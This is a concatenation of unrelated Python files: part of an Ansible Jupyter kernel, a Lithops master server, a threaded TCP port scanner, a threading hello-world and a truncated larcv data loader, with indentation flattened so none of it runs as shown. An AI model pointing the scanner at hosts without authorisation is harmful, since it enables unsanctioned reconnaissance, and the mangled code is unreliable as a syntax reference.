open(os.path.join(group_vars, group), 'w') as f: f.write("".join(code_lines[1:])) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_execute_play(self, code): if self.is_ansible_alive(): self.do_shutdown(False) self.start_helper() code_data = yaml.load(code, Loader=yaml.FullLoader) logger.debug('code_data %r', code_data) logger.debug('code_data type: %s', type(code_data)) self.current_play = code playbook = [] current_play = yaml.load(self.current_play, Loader=yaml.FullLoader) if current_play is None: current_play = {} playbook.append(current_play) tasks = current_play['tasks'] = current_play.get('tasks', []) current_play['roles'] = current_play.get('roles', []) for role in current_play['roles']: if "." in role: self.get_galaxy_role(role) current_play['roles'].insert(0, 'ansible_kernel_helpers') tasks.append({'pause_for_kernel': {'host': '127.0.0.1', 'port': self.helper.pause_socket_port, 'task_num': self.tasks_counter - 1}}) widget_vars_file = os.path.join(self.temp_dir, 'project', 'widget_vars.yml') with open(widget_vars_file, 'w') as f: f.write(yaml.dump({})) tasks.append({'include_vars': {'file': 'widget_vars.yml'}}) tasks.append( {'include_tasks': 'next_task{0}.yml'.format(self.tasks_counter)}) logger.debug(yaml.safe_dump(playbook, default_flow_style=False)) if not os.path.exists(os.path.join(self.temp_dir, 'project')): os.mkdir(os.path.join(self.temp_dir, 'project')) self.playbook_file = (os.path.join(self.temp_dir, 'project', 'playbook.yml')) with open(self.playbook_file, 'w') as f: f.write(yaml.safe_dump(playbook, default_flow_style=False)) # Weird work around for streaming content not showing stream_content = {'name': 'stdout', 'text': '\n'} self.send_response(self.iopub_socket, 'stream', stream_content) # End weird work around self.start_ansible_playbook() logger.info("done") return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def start_ansible_playbook(self): # We may need to purge artifacts when we start again if os.path.exists(os.path.join(self.temp_dir, 'artifacts')): shutil.rmtree(os.path.join(self.temp_dir, 'artifacts')) logger.info("runner starting") env = os.environ.copy() env['ANSIBLE_KERNEL_STATUS_PORT'] = str(self.helper.status_socket_port) self.runner_thread, self.runner = ansible_runner.run_async(private_data_dir=self.temp_dir, playbook="playbook.yml", quiet=True, debug=True, ignore_logging=True, cancel_callback=self.cancel_callback, finished_callback=self.finished_callback, event_handler=self.runner_process_message) logger.info("runner started") logger.info("Runner status: {}".format(self.runner.status)) while self.runner.status in ['unstarted', 'running', 'starting']: logger.info("In runner loop") try: logger.info("getting message %s", self.helper.pause_socket_port) msg = self.queue.get(timeout=1) except queue.Empty: logger.info("Queue Empty!") continue logger.info(msg) if isinstance(msg, StatusMessage): if self.process_message(msg.message): break elif isinstance(msg, TaskCompletionMessage): logger.info('msg.task_num %s tasks_counter %s', msg.task_num, self.tasks_counter) break elif not self.is_ansible_alive(): logger.info("ansible is dead") self.do_shutdown(False) break logger.info("Bottom of runner loop") time.sleep(1) logger.info("Runner state is now {}".format(self.runner.status)) self.clean_up_task_files() logger.info("done") def process_widgets(self): # Extract values from widgets # Values in widgets with a var_name property are added to the vars file # Values in widgets with a ansible_kernel_property are store into special variables widget_vars_file = os.path.join(self.temp_dir, 'project', 'widget_vars.yml') logger.debug("widget_vars_file %s", widget_vars_file) widget_vars = {} for widget in sorted(self.widgets.values(), key=lambda x: x['widget_update_order']): logger.debug("widget %s", pformat(widget)) if 'var_name' in widget and 'value' in widget: widget_vars[widget['var_name']] = widget['value'] if 'ansible_kernel_property' in widget and 'value' in widget: if widget['ansible_kernel_property'] == 'vault_password': self.vault_password = widget['value'] logger.debug("set vault_password") # Save the vars from the widgets and include it for this task with open(widget_vars_file, 'w') as f: f.write(yaml.safe_dump(widget_vars, default_flow_style=False)) def do_execute_task(self, code): if not self.is_ansible_alive(): logger.info("ansible is dead") self.do_shutdown(False) if self.helper is None: output = "No play found. Run a valid play cell" stream_content = {'name': 'stdout', 'text': str(output)} self.send_response(self.iopub_socket, 'stream', stream_content) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} self.registered_variable = None self.current_task = code try: code_data = yaml.load(code, Loader=yaml.FullLoader) except Exception: code_data = code logger.debug('code_data %s', code_data) logger.debug('code_data type: %s', type(code_data)) if isinstance(code_data, str): if (code_data.endswith("?")): module = code_data[:-1].split()[-1] else: module = code_data.split()[-1] data = self.get_module_doc(module) payload = dict( source='', data=data) logging.debug('payload %s', payload) # content = {'name': 'stdout', 'text': str(payload)} self.send_response(self.iopub_socket, 'display_data', payload) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} elif isinstance(code_data, list): code_data = code_data[0] elif isinstance(code_data, dict): code_data = code_data elif code_data is None: return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} else: logger.error('code_data %s unsupported type', type(code_data)) if not isinstance(code_data, dict): try: code_data = yaml.load(code, Loader=yaml.FullLoader) tb = [] except Exception: tb = traceback.format_exc(1).splitlines() reply = {'status': 'error', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}, 'traceback': ['Invalid task cell\n'] + tb, 'ename': 'Invalid cell', 'evalue': ''} self.send_response(self.iopub_socket, 'error', reply, ident=self._topic('error')) return reply if 'include_role' in code_data.keys(): role_name = code_data['include_role'].get('name', '') if '.' in role_name: self.get_galaxy_role(role_name) if 'register' in code_data.keys(): self.registered_variable = code_data['register'] interrupted = False try: tasks = [] current_task_data = yaml.load(self.current_task, Loader=yaml.FullLoader) current_task_data['ignore_errors'] = True tasks.append(current_task_data) tasks.append({'pause_for_kernel': {'host': '127.0.0.1', 'port': self.helper.pause_socket_port, 'task_num': self.tasks_counter}}) self.process_widgets() tasks.append({'include_vars': {'file': 'widget_vars.yml'}}) # Create the include file task to look for the future task tasks.append( {'include_tasks': 'next_task{0}.yml'.format(self.tasks_counter + 1)}) logger.debug(yaml.safe_dump(tasks, default_flow_style=False)) self.next_task_file = os.path.join(self.temp_dir, 'project', 'next_task{0}.yml'.format(self.tasks_counter)) self.tasks_counter += 1 self.task_files.append(self.next_task_file) with open(self.next_task_file, 'w') as f: f.write(yaml.safe_dump(tasks, default_flow_style=False)) logger.info('Wrote %s', self.next_task_file) self.helper.pause_socket.send_string('Proceed') while True: logger.info("getting message %s", self.helper.pause_socket_port) msg = self.queue.get() logger.info(msg) if isinstance(msg, StatusMessage): if self.process_message(msg.message): break elif isinstance(msg, TaskCompletionMessage): logger.info('msg.task_num %s tasks_counter %s', msg.task_num, self.tasks_counter) break except KeyboardInterrupt: logger.error(traceback.format_exc()) if interrupted: return {'status': 'abort', 'execution_count': self.execution_count} return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_execute_python(self, code): code = "".join(code.splitlines(True)[1:]) reply_content = {} res = self.shell.run_cell(code) logger.debug('do_execute_python res %s', pformat(res)) if res.success: reply_content['status'] = 'ok' else: reply_content['status'] = 'error' reply_content['execution_count'] = self.execution_count reply_content['payload'] = self.shell.payload_manager.read_payload() self.shell.payload_manager.clear_payload() self.export_python_variables() return reply_content def export_python_variables(self): try: self.silent = True original_display_trap = self.shell.display_trap self.shell.display_trap = NullDisplayTrap line1 = "import types" line2 = "import json" line3 = "json.dumps([_x for _x, _v in globals().items() if " \ "not _x.startswith('_') and " \ "_x not in ['In', 'Out', 'quit', 'pprint', 'exit', 'get_ipython'] and " \ "not isinstance(_v, types.ModuleType)])" for line in [line1, line2, line3]: res = self.shell.run_cell(line) logger.debug('export_python_variables res %s', pformat(res)) logger.debug('export_python_variables NullDisplay %s', pformat(NullDisplay.exec_result)) variable_values = dict() if res.success and NullDisplay.exec_result: logger.debug('export_python_variables %s', pformat(json.loads(NullDisplay.exec_result))) variable_names = json.loads(NullDisplay.exec_result) NullDisplay.exec_result = None for variable in variable_names: res = self.shell.run_cell('json.dumps({0})'.format(variable)) if res.success and NullDisplay.exec_result: variable_values[variable] = json.loads(NullDisplay.exec_result) NullDisplay.exec_result = None else: logger.debug('export_python_variables error') logger.debug('export_python_variables variable_values %s', pformat(variable_values)) self.do_execute_task(yaml.dump(dict(set_fact=variable_values))) finally: self.silent = False self.shell.display_trap = original_display_trap def do_execute_vault_password(self, code): self.shell.run_cell("import ansible_kernel.widgets\n" "style = {'description_width': 'initial'}\n" "ansible_kernel.widgets.VaultPassword(description='Vault Password:', style=style)\n") return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_complete(self, code, cursor_pos): code = code[:cursor_pos] default = {'matches': [], 'cursor_start': 0, 'cursor_end': cursor_pos, 'metadata': dict(), 'status': 'ok'} if code.strip().startswith("#inventory"): return default elif code.strip().startswith("#ansible.cfg"): return default elif code.strip().startswith("#host_vars"): return default elif code.strip().startswith("#group_vars"): return default elif code.strip().startswith("#task"): return self.do_complete_task(code, cursor_pos) elif code.strip().startswith("#play"): return self.do_complete_play(code, cursor_pos) else: return self.do_complete_task(code, cursor_pos) def do_complete_task(self, code, cursor_pos): default = {'matches': [], 'cursor_start': 0, 'cursor_end': cursor_pos, 'metadata': dict(), 'status': 'ok'} logger.debug('code %r', code) if not code or code[-1] == ' ': return default found_module = False code_data = None try: code_data = yaml.load(code, Loader=yaml.FullLoader) except Exception: try: code_data = yaml.load(code + ":", Loader=yaml.FullLoader) except Exception: code_data = None if code_data is not None: logger.debug('code_data %s', code_data) if isinstance(code_data, list) and len(code_data) > 0: code_data = code_data[0] if isinstance(code_data, dict): for key in code_data.keys(): if key in modules: module_name = key found_module = True break logger.debug('found_module %s', found_module) tokens = code.split() if not tokens: return default matches = [] token = tokens[-1] start = cursor_pos - len(token) logger.debug('token %s', token) if not found_module: for module in TASK_ARGS_MODULES: if module.startswith(token): matches.append(module) else: for arg in module_args.get(module_name, []) + task_args: if arg.startswith(token): matches.append(arg) if not matches: return default matches = [m for m in matches if m.startswith(token)] return {'matches': sorted(matches), 'cursor_start': start, 'cursor_end': cursor_pos, 'metadata': dict(), 'status': 'ok'} def do_complete_play(self, code, cursor_pos): default = {'matches': [], 'cursor_start': 0, 'cursor_end': cursor_pos, 'metadata': dict(), 'status': 'ok'} logger.debug('code %r', code) if not code or code[-1] == ' ': return default tokens = code.split() if not tokens: return default matches = [] token = tokens[-1] start = cursor_pos - len(token) logger.debug('token %s', token) for arg in play_args: if arg.startswith(token): matches.append(arg) if not matches: return default matches = [m for m in matches if m.startswith(token)] return {'matches': sorted(matches), 'cursor_start': start, 'cursor_end': cursor_pos, 'metadata': dict(), 'status': 'ok'} def do_inspect(self, code, cursor_pos, detail_level=0): logger.debug("code %s", code) logger.debug("cursor_pos %s", cursor_pos) logger.debug("detail_level %s", detail_level) if code.strip().startswith("#inventory"): logger.info("#inentory not supported") return {'status': 'ok', 'data': {}, 'metadata': {}, 'found': True} elif code.strip().startswith("#task"): return self.do_inspect_module(code, cursor_pos, detail_level) elif code.strip().startswith("#play"): logger.info("#play not supported") return {'status': 'ok', 'data': {}, 'metadata': {}, 'found': True} else: return self.do_inspect_module(code, cursor_pos, detail_level) def do_inspect_module(self, code, cursor_pos, detail_level=0): data = dict() code_data = yaml.load(code, Loader=yaml.FullLoader) logger.debug("code_data %s", code_data) if isinstance(code_data, str): module = code_data elif isinstance(code_data, dict): for arg in task_args: if arg in code_data: del code_data[arg] module = code_data.keys()[0] else: logger.warn('code type not supported %s', type(code_data)) return {'status': 'ok', 'data': {}, 'metadata': {}, 'found': False} data.update(self.get_module_doc(module)) return {'status': 'ok', 'data': data, 'metadata': {}, 'found': True} def get_galaxy_role(self, role_name): command = ['ansible-galaxy', 'list', '-p', 'project/roles'] logger.debug("command %s", command) p = Popen(command, cwd=self.temp_dir, stdout=PIPE, stderr=STDOUT) p.wait() exitcode = p.returncode logger.debug('exitcode %s', exitcode) output = p.communicate()[0].decode('utf-8') for line in output.splitlines(): if line.startswith('- '): role, _, version = line[2:].partition(',') role = role.strip() if role == role_name: return p = Popen(command, cwd=self.temp_dir, stdout=PIPE, stderr=STDOUT, ) command = ['ansible-galaxy', 'install', '-p', 'project/roles', role_name] logger.debug("command %s", command) p = Popen(command, cwd=self.temp_dir, stdout=PIPE, stderr=STDOUT, ) p.wait() exitcode = p.returncode logger.debug('exitcode %s', exitcode) output = p.communicate()[0].decode('utf-8') logger.debug('output %s', output) stream_content = {'name': 'stdout', 'text': str(output)} self.send_response(self.iopub_socket, 'stream', stream_content) def get_module_doc(self, module): data = {} logger.debug("command %s", " ".join( ['ansible-doc', '-t', 'module', module])) p = Popen(['ansible-doc', '-t', 'module', module], stdout=PIPE, stderr=STDOUT, ) p.wait() exitcode = p.returncode logger.debug('exitcode %s', exitcode) output = p.communicate()[0].decode('utf-8') logger.debug('output %s', output) data['text/plain'] = output return data def is_ansible_alive(self): if self.runner_thread is None: logger.info("NOT STARTED") return False if self.runner_thread.is_alive(): logger.info("YES") else: logger.info("NO") return self.runner_thread.is_alive() def cancel_callback(self): logger.info('called') return self.shutdown_requested def finished_callback(self, runner): logger.info('called') self.shutdown = True if not self.shutdown_requested: self.queue.put(StatusMessage(['PlaybookEnded', {}])) def do_shutdown(self, restart): if self.is_ansible_alive(): self.shutdown = False self.shutdown_requested = True while not self.shutdown: if not self.is_ansible_alive(): break logger.info("waiting for shutdown") time.sleep(1) logger.info("shutdown complete") self.shutdown_requested = False self.runner_thread = None self.runner = None if self.helper is not None: self.helper.stop() self.helper = None return {'status': 'ok', 'restart': restart} def _format_application_python(self, result): if 'application/x-python' in result: ret_value = result['application/x-python'] del result['application/x-python'] return ret_value return "" def _format_text_html(self, result): if 'text/html' in result: ret_value = result['text/html'] del result['text/html'] return ret_value return "" def _format_output(self, result): if 'stdout_lines' in result: return '\n'.join(result['stdout_lines']) return "" def _format_error(self, result): if 'stderr_lines' in result: return '\n'.join(result['stderr_lines']) return "" def _dump_results(self, result): r = result for key in ['_ansible_verbose_always', '_ansible_no_log', '_ansible_parsed', 'invocation']: if key in r: del r[key] if 'stdout' in r: if r['stdout']: r['stdout'] = '[see below]' if 'stdout_lines' in r: if r['stdout_lines']: r['stdout_lines'] = '[removed for clarity]' if 'stderr' in r: if r['stderr']: r['stderr'] = '[see below]' if 'stderr_lines' in r: if r['stderr_lines']: r['stderr_lines'] = '[removed for clarity]' if 'changed' in r: del r['changed'] if 'reason' in r: return r['reason'] return json.dumps(r, sort_keys=True, indent=4) def set_parent(self, ident, parent): super(AnsibleKernel, self).set_parent(ident, parent) self.shell.set_parent(parent) def send_multipart(self, msg, *args, **kwargs): logger.debug('send_multipart %s %s %s %s', len(msg), msg, args, kwargs) if len(msg) == 7: msg0, msg1, msg2, msg3, msg4, msg5, msg6 = msg logger.debug("msg0 %s", msg0) logger.debug("msg1 %s", msg1) logger.debug("msg2 %s", msg2) logger.debug("msg3 %s", pformat(json.loads(msg3))) logger.debug("msg4 %s", pformat(json.loads(msg4))) logger.debug("msg5 %s", pformat(json.loads(msg5))) logger.debug("msg6 %s", pformat(json.loads(msg6))) msg3_data = json.loads(msg3) msg6_data = json.loads(msg6) if msg0.startswith(b"comm"): _, _, comm_id = msg0.partition('-') if msg3_data['msg_type'] == 'comm_open' and msg6_data['comm_id'] == comm_id: self.update_widget(comm_id, msg6_data.get('data', {}).get('state', {})) logger.debug("new widget %s %s", comm_id, pformat(self.widgets[comm_id])) if msg3_data['msg_type'] == 'comm_msg' and msg6_data['comm_id'] == comm_id: if msg6_data.get('data', {}).get('method') == 'update': self.update_widget(comm_id, msg6_data.get('data', {}).get('state', {})) logger.debug("update widget %s %s", comm_id, pformat(self.widgets[comm_id])) def update_widget(self, comm_id, state): self.widgets[comm_id].update(state) self.widgets[comm_id]['widget_update_order'] = self.widget_update_order self.widget_update_order += 1 def comm_open(self, stream, ident, msg): logger.debug("comm_open: %s %s", ident, msg) self.comm_manager.comm_open(stream, ident, msg) def comm_msg(self, stream, ident, msg): logger.debug("comm_msg: %s %s", ident, msg) logger.debug("msg %s", pformat(msg)) comm_id = msg.get('content', {}).get('comm_id', {}) if comm_id in self.widgets: self.widgets[comm_id].update(msg.get('content', {}).get('data', {}).get('state', {})) logger.debug("updated widget %s %s", comm_id, self.widgets[comm_id]) self.comm_manager.comm_msg(stream, ident, msg) def comm_close(self, stream, ident, msg): logger.debug("comm_close: %s %s", ident, msg) self.comm_manager.comm_close(stream, ident, msg)
master.py
# # Copyright Cloudlab URV 2020 # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import os import copy import time import json import uuid import flask import queue import logging import multiprocessing as mp from pathlib import Path from gevent.pywsgi import WSGIServer from concurrent.futures import ThreadPoolExecutor from lithops.constants import LITHOPS_TEMP_DIR, STANDALONE_LOG_FILE, JOBS_DIR,\ STANDALONE_SERVICE_PORT, STANDALONE_CONFIG_FILE, STANDALONE_INSTALL_DIR from lithops.localhost.localhost import LocalhostHandler from lithops.utils import verify_runtime_name, iterchunks, setup_lithops_logger from lithops.standalone.utils import get_worker_setup_script from lithops.standalone.keeper import BudgetKeeper setup_lithops_logger(logging.DEBUG, filename=STANDALONE_LOG_FILE) logger = logging.getLogger('lithops.standalone.master') app = flask.Flask(__name__) INSTANCE_START_TIMEOUT = 200 MAX_INSTANCE_CREATE_RETRIES = 3 STANDALONE_CONFIG = None STANDALONE_HANDLER = None BUDGET_KEEPER = None JOB_PROCESSES = {} WORK_QUEUES = {} MASTER_IP = None MP_MANAGER = mp.Manager() def is_worker_instance_ready(vm): """ Checks if the VM instance is ready to receive ssh connections """ try: vm.get_ssh_client().run_remote_command('id') except Exception as e: logger.debug('ssh to {} failed: {}' .format(vm.ip_address, e)) vm.del_ssh_client() return False return True def wait_worker_instance_ready(vm): """ Waits until the VM instance is ready to receive ssh connections """ logger.info('Waiting {} to become ready'.format(vm)) start = time.time() while(time.time() - start < INSTANCE_START_TIMEOUT): if is_worker_instance_ready(vm): logger.info('{} ready in {} seconds' .format(vm, round(time.time()-start, 2))) return True time.sleep(5) msg = 'Readiness probe expired on {}'.format(vm) logger.error(msg) raise TimeoutError(msg) def setup_worker(worker_info, work_queue, job_key): """ Run worker process Install all the Lithops dependencies into the worker. Runs the job """ instance_name, ip_address, instance_id = worker_info logger.info('Starting setup for VM instance {}'.format(instance_name)) vm = STANDALONE_HANDLER.backend.get_vm(instance_name) vm.ip_address = ip_address vm.instance_id = instance_id worker_ready = False retry = 0 logger.info('Queue empty: {} - Queue size: {}' .format(work_queue.empty(), work_queue.qsize())) while(not worker_ready and not work_queue.empty() and retry < MAX_INSTANCE_CREATE_RETRIES): try: wait_worker_instance_ready(vm) worker_ready = True except TimeoutError: # VM not started in time if retry == MAX_INSTANCE_CREATE_RETRIES: msg = '{} readiness probe failed after {} retries.'.format(vm, retry) logger.debug(msg) raise Exception(msg) logger.info('Recreating VM instance {}'.format(vm.name)) retry += 1 vm.delete() vm.create() if work_queue.empty(): logger.info('Work queue is already empty. Skipping {}'.format(vm)) return # upload zip lithops package logger.info('Uploading lithops files to {}'.format(vm)) vm.get_ssh_client().upload_local_file('/opt/lithops/lithops_standalone.zip', '/tmp/lithops_standalone.zip') logger.info('Executing lithops installation process on {}'.format(vm)) vm_data = {'instance_name': vm.name, 'ip_address': vm.ip_address, 'instance_id': vm.instance_id, 'master_ip': MASTER_IP, 'job_key': job_key} script = get_worker_setup_script(STANDALONE_CONFIG, vm_data) vm.get_ssh_client().run_remote_command(script, run_async=True) vm.del_ssh_client() logger.info('Installation script submitted to {}'.format(vm)) def stop_job_process(job_key): """ Stops a job process """ global JOB_PROCESSES done = os.path.join(JOBS_DIR, job_key+'.done') Path(done).touch() if job_key in JOB_PROCESSES and JOB_PROCESSES[job_key].is_alive(): JOB_PROCESSES[job_key].terminate() logger.info('Finished job {} invocation'.format(job_key)) del JOB_PROCESSES[job_key] def run_job_process(job_payload, work_queue): """ Process responsible to wait for workers to become ready, and submit individual tasks of the job to them """ job_key = job_payload['job_key'] call_ids = job_payload['call_ids'] chunksize = job_payload['chunksize'] workers = job_payload['worker_instances'] for call_ids_range in iterchunks(call_ids, chunksize): task_payload = copy.deepcopy(job_payload) dbr = task_payload['data_byte_ranges'] task_payload['call_ids'] = call_ids_range task_payload['data_byte_ranges'] = [dbr[int(call_id)] for call_id in call_ids_range] work_queue.put(task_payload) logger.info("Total tasks in {} work queue: {}".format(job_key, work_queue.qsize())) with ThreadPoolExecutor(len(workers)) as executor: for worker_info in workers: executor.submit(setup_worker, worker_info, work_queue, job_key) logger.info('All workers set up for job {}'.format(job_key)) while not work_queue.empty(): time.sleep(1) done = os.path.join(JOBS_DIR, job_key+'.done') Path(done).touch() logger.info('Finished job {} invocation.'.format(job_key)) def error(msg): response = flask.jsonify({'error': msg}) response.status_code = 404 return response @app.route('/get-task/<job_key>', methods=['GET']) def get_task(job_key): """ Returns a task from the work queue """ global WORK_QUEUES global JOB_PROCESSES try: task_payload = WORK_QUEUES[job_key].get(timeout=0.1) response = flask.jsonify(task_payload) response.status_code = 200 logger.info('Calls {} invoked on {}' .format(', '.join(task_payload['call_ids']), flask.request.remote_addr)) except queue.Empty: stop_job_process(job_key) response = ('', 204) return response @app.route('/clear', methods=['POST']) def clear(): """ Stops received job processes """ global JOB_PROCESSES job_key_list = flask.request.get_json(force=True, silent=True) for job_key in job_key_list: if job_key in JOB_PROCESSES and JOB_PROCESSES[job_key].is_alive(): logger.info('Received SIGTERM: Stopping job process {}' .format(job_key)) stop_job_process(job_key) return ('', 204) @app.route('/run', methods=['POST']) def run(): """ Run a job locally, in consume mode """ global BUDGET_KEEPER global WORK_QUEUES global JOB_PROCESSES job_payload = flask.request.get_json(force=True, silent=True) if job_payload and not isinstance(job_payload, dict): return error('The action did not receive a dictionary as an argument.') try: runtime = job_payload['runtime_name'] verify_runtime_name(runtime) except Exception as e: return error(str(e)) job_key = job_payload['job_key'] logger.info('Received job {}'.format(job_key)) BUDGET_KEEPER.last_usage_time = time.time() BUDGET_KEEPER.update_config(job_payload['config']['standalone']) BUDGET_KEEPER.jobs[job_key] = 'running' exec_mode = job_payload['config']['standalone'].get('exec_mode', 'consume') if exec_mode == 'consume': # Consume mode runs the job locally pull_runtime = STANDALONE_CONFIG.get('pull_runtime', False) try: localhost_handler = LocalhostHandler({'runtime': runtime, 'pull_runtime': pull_runtime}) localhost_handler.invoke(job_payload, workers=1) except Exception as e: logger.error(e) elif exec_mode == 'create': # Create mode runs the job in worker VMs work_queue = MP_MANAGER.Queue() WORK_QUEUES[job_key] = work_queue jp = mp.Process(target=run_job_process, args=(job_payload, work_queue)) jp.daemon = True jp.start() JOB_PROCESSES[job_key] = jp act_id = str(uuid.uuid4()).replace('-', '')[:12] response = flask.jsonify({'activationId': act_id}) response.status_code = 202 return response @app.route('/ping', methods=['GET']) def ping(): response = flask.jsonify({'response': 'pong'}) response.status_code = 200 return response @app.route('/preinstalls', methods=['GET']) def preinstalls(): payload = flask.request.get_json(force=True, silent=True) if payload and not isinstance(payload, dict): return error('The action did not receive a dictionary as an argument.') try: runtime = payload['runtime'] verify_runtime_name(runtime) except Exception as e: return error(str(e)) pull_runtime = STANDALONE_CONFIG.get('pull_runtime', False) localhost_handler = LocalhostHandler({'runtime': runtime, 'pull_runtime': pull_runtime}) runtime_meta = localhost_handler.create_runtime(runtime) response = flask.jsonify(runtime_meta) response.status_code = 200 return response def main(): global STANDALONE_CONFIG global STANDALONE_HANDLER global BUDGET_KEEPER global MASTER_IP os.makedirs(LITHOPS_TEMP_DIR, exist_ok=True) with open(STANDALONE_CONFIG_FILE, 'r') as cf: STANDALONE_CONFIG = json.load(cf) # Delete ssh_key_filename backend = STANDALONE_CONFIG['backend'] if 'ssh_key_filename' in STANDALONE_CONFIG[backend]: del STANDALONE_CONFIG[backend]['ssh_key_filename'] vm_data_file = os.path.join(STANDALONE_INSTALL_DIR, 'access.data') with open(vm_data_file, 'r') as ad: MASTER_IP = json.load(ad)['ip_address'] BUDGET_KEEPER = BudgetKeeper(STANDALONE_CONFIG) BUDGET_KEEPER.start() STANDALONE_HANDLER = BUDGET_KEEPER.sh server = WSGIServer(('0.0.0.0', STANDALONE_SERVICE_PORT), app, log=app.logger) server.serve_forever() if __name__ == '__main__': main()
scanner.py
import struct import socket import threading import queue import logging from enum import Enum, auto logger = logging.getLogger(__name__) class PortState(Enum): OPEN = auto() CLOSED = auto() FILTERED = auto() class TCPScanner: def __init__(self, host, ports, timeout=5): self.host = host self.ports = ports self.timeout = timeout self.results = [] self.q = queue.SimpleQueue() self.failed = False def scan(self, num_threads=5): for port in self.ports: self.q.put(port) threads = [] for i in range(num_threads): t = threading.Thread(target=self.run) t.start() threads.append(t) for t in threads: t.join() def run(self): while True: if self.failed: break try: port = self.q.get(block=False) except queue.Empty: break try: self._scan(port) except Exception as e: logger.exception(e) self.failed = True break def _scan(self, port): try: conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM) conn.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack("ii", 1, 0)) conn.settimeout(self.timeout) ret = conn.connect_ex((self.host, port)) # DATA RECEIVED - SYN ACK if ret == 0: logger.debug('%s:%d - tcp open (SYN-ACK packet)' % (self.host, port)) self.results.append((port, PortState.OPEN)) # RST RECEIVED - PORT CLOSED elif ret == 111: logger.debug('%s:%d - tcp closed (RST packet)' % (self.host, port)) self.results.append((port, PortState.CLOSED)) # ERR CODE 11 - TIMEOUT elif ret == 11: self.results.append((port, PortState.FILTERED)) else: logger.debug('%s:%d - code %d' % (self.host, port, ret)) conn.close() except socket.timeout: self.results.append((port, PortState.FILTERED))
hello_world.py
#!/usr/bin/python # This is Hello World with Python multithreading. # A user defined function is created and # the function is called when a thread is initialized. import threading def MyFunction(): """This is a user defined function""" print "Hello World" fp = open("file.abc") return def Main(): """This is where we create a thread. Target means run this function when a thread is initiated.""" myThread = threading.Thread(target=MyFunction) myThread.start() # Starting a thread fp = open("def.txt") fp.close() if __name__ == '__main__': Main()
dataloader3.py
#import ROOT,sys,time,os,signal from larcv import larcv import ROOT as rt import sys,time,os,signal import numpy as np import threading def threadio_func(storage, proc): storage._threaded = True while storage._threaded: time.sleep(0.000005) if storage._filled: continue storage._read_start_time = time.time() while 1: if proc.storage_status_array()[storage._storage_id] == 3: storage._read_end_time=time.time() break time.sleep(0.000005) continue storage.next() storage._event_ids = proc.processed_entries(storage._storage_id) storage._ttree_entries = proc.processed_entries(storage._storage_id) return class threadio_storage(object): def __init__(self,storage_id): self._storage_id = int(storage_id) self._storage_m = {} self._filled = False self._threaded = False self._empty = False self._read_start_time = self._read_end_time = -1 self._copy_start_time = self._copy_end_time = -1 self._event_ids = None self._ttree_entries = None assert self._storage_id >= 0 def register(self, key, dtype, make_copy=False): assert (not key in self._storage_m.keys()) self._storage_m[key] = threadio_pydata(key,dtype) self._storage_m[key]._storage_id = self._storage_id self._storage_m[key]._make_copy = make_copy def fetch_data(self,key): try: return self._storage_m[key] except KeyError: sys.stderr.write('Cannot fetch data w/ key %s (unknown)\n' % key) return def next(self): self._filled=False self._copy_start_time = time.time() for name, storage in self._storage_m.iteritems(): dtype = storage.dtype() batch_data = larcv.BatchDataStorageFactory(dtype).get().get_storage(name).get_batch(self._storage_id) storage.set_data(self._storage_id, batch_data) self._copy_end_time = time.time() self._filled=True def release(self): self._filled = False return class threadio_pydata(object): _name = None _storage_id = -1 _dtype = None _npy_data = None _dim_data = None _time_copy = 0 _time_reshape = 0 _make_copy = False def __init__(self,name,dtype): self._name = str(name) self._storage_id = -1 self._dtype = dtype self._npy_data = None self._dim_data = None self._time_copy = None self._time_reshape = None self._make_copy = False def batch_data_size(self): dsize=1 for v in self._dim_data: dsize *= v return dsize def dtype(self): return self._dtype def data(self): return self._npy_data def dim(self): return self._dim_data def time_copy(self): return self._time_copy def time_reshape(self): return self._time_reshape def set_data(self,storage_id,larcv_batchdata): self._storage_id = storage_id dim = larcv_batchdata.dim() # set dimension if self._dim_data is None: self._dim_data = np.array([dim[i] for i in xrange(dim.size())]).astype(np.int32) else: if not len(self._dim_data) == dim.size(): sys.stderr.write('Dimension array length changed (%d => %d)\n' % (len(self._dim_data),dim.size())) raise TypeError for i in xrange(len(self._dim_data)): if not self._dim_data[i] == dim[i]: sys.stderr.write('%d-th dimension changed (%d => %d)\n' % (i,self._dim_data[i],dim[i])) raise ValueError # copy data into numpy array ctime = time.time() if self._make_copy: if self._npy_data is None: self._npy_data = np.array(larcv_batchdata.data()) else: self._npy_data = self._npy_data.reshape(self.batch_data_size()) larcv.copy_array(self._npy_data,larcv_batchdata.data()) else: self._npy_data = larcv.as_ndarray(larcv_batchdata.data()) self._time_copy = time.time() - ctime ctime = time.time() self._npy_data = self._npy_data.reshape(self._dim_data[0], self.batch_data_size()/self._dim_data[0]) self.time_data_conv = time.time() - ctime return class larcv_threadio (object): _instance_m={} @classmethod def exist(cls,name): name = str(name) return name in cls._instance_m @classmethod def instance_by_name(cls,name): return cls._instance_m[name] def __init__(self): self._proc = None self._name = '' self._verbose = False self._cfg_file = None self._target_storage_id = 0 self._storage_v = [] self._thread_v = [] def reset(self): self.stop_manager() if self._proc: self._proc.reset() def __del__(self): try: self.reset() except AttrbuteError: pass def configure(self,cfg): # if "this" was configured before, reset it if self._name: self.reset() # get name if not cfg['filler_name']: sys.stderr.write('filler_name is empty!\n') raise ValueError # ensure unique name if self.__class__.exist(cfg['filler_name']) and not self.__class__.instance_by_name(cfg['filler_name']) == self: sys.stderr.write('filler_name %s already running!' % cfg['filler_name']) return self._name = cfg['filler_name'] # get ThreadProcessor config file self._cfg_file = cfg['filler_cfg'] if not self._cfg_file or not os.path.isfile(self._cfg_file): 